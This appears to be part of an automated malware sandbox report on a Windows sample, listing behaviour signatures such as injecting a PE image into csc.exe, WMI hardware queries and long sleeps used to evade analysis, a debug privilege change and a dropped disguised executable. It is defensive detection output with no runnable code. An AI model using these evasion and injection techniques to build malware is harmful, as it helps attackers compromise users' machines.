              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 4F20000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6CD0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 4F70000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 399000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 599469Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 599358Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 599250Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 356000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 597890Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWindow / User API: threadDelayed 6082Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWindow / User API: threadDelayed 3708Jump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeDropped PE file which has not been started: C:\Users\user\Videos\ElectronArts\Bin\ElectronArtsCLI.exeJump to dropped file
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeAPI coverage: 0.3 %
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep count: 33 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -30437127721620741s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -60000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6424Thread sleep count: 6082 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 6424Thread sleep count: 3708 > 30Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -59891s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -59782s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -59657s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -59532s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -59407s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -59282s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -59172s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -59062s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -58906s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -58797s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -58683s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -58575s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -58469s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -58344s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -58229s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -58102s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -57969s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -57860s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -57750s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -57638s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -57526s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -57422s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -57313s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -57189s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -57063s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -56938s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -56813s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -56688s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -56563s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -56453s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -56344s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -56219s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -56107s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -55797s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -55485s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -55283s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 5828Thread sleep time: -399000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -599469s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -599358s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -599250s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -59875s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -59766s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -59641s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -59531s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -59422s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -59312s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -59198s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -59078s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -58968s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -58858s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -58750s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 5828Thread sleep time: -356000s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 2272Thread sleep time: -597890s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00415858 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00415858
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413800 FindFirstFileA,FindClose,0_2_00413800
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040A0D8 FindNextFileA,FindClose,FindFirstFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,0_2_0040A0D8
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004151A0 FindFirstFileA,FindClose,GetFileAttributesA,SetFileAttributesA,SetLastError,CopyFileA,GetLastError,SetLastError,GetLastError,GetFileAttributesA,SetFileAttributesA,0_2_004151A0
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414A00 FindFirstFileA,FindClose,Sleep,Sleep,Sleep,GetFileAttributesA,SetFileAttributesA,DeleteFileA,0_2_00414A00
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414290 FindFirstFileA,FindClose,FindClose,0_2_00414290
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414340 FindFirstFileA,FindClose,0_2_00414340
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414380 FindFirstFileA,FindClose,FindFirstFileA,FindClose,CreateDirectoryA,RemoveDirectoryA,Sleep,FindFirstFileA,FindClose,RemoveDirectoryA,Sleep,0_2_00414380
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414C50 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00414C50
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0040AC10 FindFirstFileA,FindNextFileA,FindClose,0_2_0040AC10
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414D36 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00414D36
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004145D0 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_004145D0
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00415590 FindFirstFileA,CreateDirectoryA,CreateDirectoryA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00415590
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413E20 GetCurrentDirectoryA,FindFirstFileA,FindClose,SetCurrentDirectoryA,FindFirstFileA,FindClose,CreateProcessA,Sleep,SetLastError,CreateProcessA,GetExitCodeProcess,Sleep,Sleep,SetCurrentDirectoryA,GetLastError,FormatMessageA,LocalFree,0_2_00413E20
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414626 FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00414626
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00417E90 FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00417E90
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414697 FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_00414697
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004156B5 FindFirstFileA,CreateDirectoryA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,0_2_004156B5
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00409F7A FindFirstFileA,GetFileAttributesA,SetFileAttributesA,FindNextFileA,FindClose,FindFirstFileA,FindNextFileA,FindClose,FindFirstFileA,Sleep,DeleteFileA,FindNextFileA,FindClose,0_2_00409F7A
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00414F30 FindFirstFileA,FindClose,FindClose,0_2_00414F30
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_0042407C VirtualQuery,GetSystemInfo,VirtualQuery,VirtualAlloc,VirtualProtect,0_2_0042407C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 60000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59891Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59782Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59657Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59532Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59407Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59282Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59172Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59062Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58906Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58797Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58683Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58575Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58469Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58229Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58102Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57969Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57860Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57638Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57526Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57313Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57189Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 57063Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56938Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56813Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56688Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56563Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56453Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56344Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56219Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 56107Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 55797Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 55485Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 55283Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 399000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 599469Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 599358Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 599250Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59875Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59766Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59641Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59531Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59422Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59312Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59198Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 59078Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58968Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58858Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 58750Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 356000Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 597890Jump to behavior
              Source: csc.exe, 00000003.00000002.3789805471.00000000097F0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll16CapabilityDescriptions
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_004148D0 Sleep,SetErrorMode,SetErrorMode,LoadLibraryA,GetProcAddress,FreeLibrary,SetErrorMode,0_2_004148D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4F0000 protect: page execute and read and writeJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4F0000 value starts with: 4D5AJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4F0000Jump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 60F008Jump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413910 ImpersonateSelf,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,GetLastError,RevertToSelf,0_2_00413910
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00413910 ImpersonateSelf,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,GetLastError,RevertToSelf,0_2_00413910
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,0_2_00422895
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: GetLocaleInfoA,0_2_00432551
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: EnumSystemLocalesA,0_2_00430605
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: EnumSystemLocalesA,0_2_0043063C
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: EnumSystemLocalesA,0_2_004306C2
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: GetLocaleInfoA,_TranslateName,_TranslateName,IsValidCodePage,IsValidLocale,0_2_00430717
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\3XSXmrEOw7.exeCode function: 0_2_00425CF4 GetSystemTimeAsFileTime,__aulldiv,0_2_00425CF4
